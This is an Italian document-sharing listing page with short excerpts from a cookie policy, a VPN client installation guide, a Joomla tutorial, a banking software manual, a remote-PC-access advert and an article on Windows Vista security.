I cookie sono classificati in base alla durata e al sito che li ha impostati. 1. Informativa sui cookie 1.1. Informazioni sui cookie I siti Web si avvalgono di tecniche utili e intelligenti per aumentare la semplicità di utilizzo e rendere i siti più interessanti per ogni visitatore.

Dettagli

Procedura di abilitazione alla Rete di Lombardia Integrata

Procedura di abilitazione alla Rete di Lombardia Integrata VPN Client Versione 5.0.07 - Release 2 Procedura di abilitazione alla Rete di Lombardia Integrata La presente procedura descrive la fase di installazione dell applicazione VPN Client versione 5.0.07 utilizzata

Dettagli

Joomla: Come installarlo e come usarlo. A cura di

Joomla: Come installarlo e come usarlo. A cura di Joomla: Come installarlo e come usarlo. A cura di In questa dispensa andremo a vedere come si installa joomla sul noto software xampp e come viene usato per creare siti web dinamici. Tecnol earn Firmato

Dettagli

Software Servizi Web UOGA

Software Servizi Web UOGA Manuale Operativo Utente Software Servizi Web UOGA S.p.A. Informatica e Servizi Interbancari Sammarinesi Strada Caiese, 3 47891 Dogana Tel. 0549 979611 Fax 0549 979699 e-mail: info@isis.sm Identificatore

Dettagli

30 giorni di prova gratuiti, entra nel sito www.mypckey.com scarica e installa subito mypckey

30 giorni di prova gratuiti, entra nel sito www.mypckey.com scarica e installa subito mypckey DA OGGI NON IMPORTA DOVE SEI, IL TUO PC DELL UFFICIO E SEMPRE A TUA DISPOSIZIONE! Installa solo un semplice programma (nessun hardware necessario!), genera la tua chiavetta USB, e sei pronto a prendere

Dettagli

Windows Vista, il nuovo sistema operativo Microsoft che cerca le giuste risposte ai quesiti di sicurezza

Windows Vista, il nuovo sistema operativo Microsoft che cerca le giuste risposte ai quesiti di sicurezza Windows Vista, il nuovo sistema operativo Microsoft che cerca le giuste risposte ai quesiti di sicurezza Microsoft Windows è il sistema operativo più diffuso, ma paradossalmente è anche quello meno sicuro.

Dettagli